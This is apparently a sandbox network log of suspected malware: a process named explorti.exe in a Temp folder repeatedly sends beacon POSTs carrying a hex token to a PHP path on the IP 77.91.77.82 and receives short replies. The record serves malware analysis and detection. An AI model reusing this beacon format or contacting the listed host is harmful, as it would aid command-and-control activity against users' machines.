                                                                Jul 3, 2024 08:38:53.355670929 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:53.579025984 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.64974377.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:53.693099022 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:54.396635056 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:54.397629023 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:54.620966911 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.64974477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:54.739654064 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:55.419109106 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:55.420062065 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:55.633768082 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.64974677.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:55.755361080 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:56.431442022 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:56.433593988 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:56.646894932 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.64974777.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:56.755342007 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:57.430682898 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:57.431660891 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:57.645616055 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.64974877.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:57.755794048 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:58.461122036 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:58.461983919 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:58.684070110 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.64974977.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:58.802357912 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:38:59.495321035 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:38:59.498838902 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:38:59.714133978 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:38:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.64975077.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:59.833770037 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:00.519179106 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:00.521873951 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:00.736553907 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.64975177.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:00.849306107 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:01.553940058 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:01.554759979 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:01.777187109 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.64975277.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:01.896008968 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:02.584150076 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:02.614321947 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:02.831358910 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.64975377.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:02.942898035 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:03.655736923 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:03.656655073 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:03.882431030 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.64975477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:03.989922047 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:04.677206993 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:04.678055048 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
